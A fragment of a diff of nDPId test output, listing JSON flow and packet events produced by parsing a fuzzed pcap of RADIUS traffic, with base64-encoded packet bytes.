XNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmZiM2E1MjI1YiwgNXIyMmE1YjMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwNbGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQIAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGxFBKmVASgNwWy5gYQ7uGHIUIDaTD8g=="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997311984,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997311984,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997311984,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997311984,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01269{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997394907,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01255{"packet_event_id":1,"packet_event_name":"packet","packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997394907,"pkt":"AAAMqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997395223} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":145,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997395223}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1528997399308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997399308,"pkt":"ABRPJQDqcNuYVcUnCABFAADhALRAAPwRUxbG4hk1CgwlAAcUchAAzVpOC1QAxRxqj+ts\/zbuXZza\/XyA7U4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b1ZrLm9yZywgNWIyMiUAMTIvZjA6Nxk6NjA6ZDE6N2S6MzcvMjI0T0oBAgBIFwEAAAEFAAClYf4DzpLiqdyPyTgI99pYAgUAAG+BQKA0HAAAC9tSu9kUjAmLAQACCwUAANTPOn7BAwke3m06BT0FpdxQErKfyMWPNDJCfwFi2pzKF6M="} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1528997399308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997399308,"pkt":"ABRPJQDqcNuYVcUnCABFAADhALRAAPwRUxbG4hk1CgwlAAcUchAAzVpOC1QAxRxqj+ts\/zbuXZza\/XyA7U4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b1ZrLm9yZywgNWIyMiUAMTIvZjA6Nxk6NjA6ZDE6N2S6MzcvMjI0T0oBAgBIFwEAAAEFAAClYf4DzpLiqdyPyTgI99pYAgUAAG+BQKA0HAAAC9tSu9kUjAmLAQACCwUAANTPOn7BAwke3m06BT0FpdxQErKfyMWPNDJCfwFi2pzKF6M="}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997399308,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00728{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997399604,"pkt":"ABRP+4pTcNuYVcUnCAAbAAEwAL1AAPwRUr7G4hk1CgxAHgcUchABHDwbAlUBFM63G2\/ABME95vC\/YtPM3\/caCwAAV8gbBVNQQxpuAAABNxA0xuSFjY5XIJgFQGu0Uv0OYONLFS6YzD8pAXH0KZXHpfwyK4L\/92l5H6gqAq8nL0kepb8RNLxJYMKQCK0eGlYCRiBKtSavfrre3EDS6oPiPCuIZCCfvU44Ccl11WwK9jFxTgAolMtFATUwMzFPNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1DYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNjEyL2YwOjc5OjYwOmQxOjdkOjM3LzIyNFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBL2pfBK3Ll7exMTohpXZCAH"} 00714{"packet_event_id":1,"packet_event_name":"packet","packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997399604,"pkt":"ABRP+4pTcNuYVcUnCAAbAAEwAL1AAPwRUr7G4hk1CgxAHgcUchABHDwbAlUBFM63G2\/ABME95vC\/YtPM3\/caCwAAV8gbBVNQQxpuAAABNxA0xuSFjY5XIJgFQGu0Uv0OYONLFS6YzD8pAXH0KZXHpfwyK4L\/92l5H6gqAq8nL0kepb8RNLxJYMKQCK0eGlYCRiBKtSavfrre3EDS6oPiPCuIZCCfvU44Ccl11WwK9jFxTgAolMtFATUwMzFPNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1DYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNjEyL2YwOjc5OjYwOmQxOjdkOjM3LzIyNFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBL2pfBK3Ll7exMTohpXZCAH"}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997399801} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":150,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997399801}
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1528997403593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997403593,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQxAAP8RAAAKDEBuxuIZNXIQBxQCxwAAAVYCv+kKLAd5QTZEtH35XGAZbVIaCgAAV8gOBMFTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqYbATUwMzExNDgwMDczNmM4MDcyQHdkYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQgLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzExMmE2MjI1YiwgNWIyMmE2MTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI0BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAEBRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ZTAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1528997403593,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997403593,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQxAAP8RAAAKDEBuxuIZNXIQBxQCxwAAAVYCv+kKLAd5QTZEtH35XGAZbVIaCgAAV8gOBMFTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqYbATUwMzExNDgwMDczNmM4MDcyQHdkYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQgLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzExMmE2MjI1YiwgNWIyMmE2MTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI0BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAEBRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ZTAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997403593,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -180,10 +180,10 @@
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1528996068129,"flow_last_seen":1528997404349,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":37428,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1528996068129,"flow_last_seen":1528997404349,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":37428,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
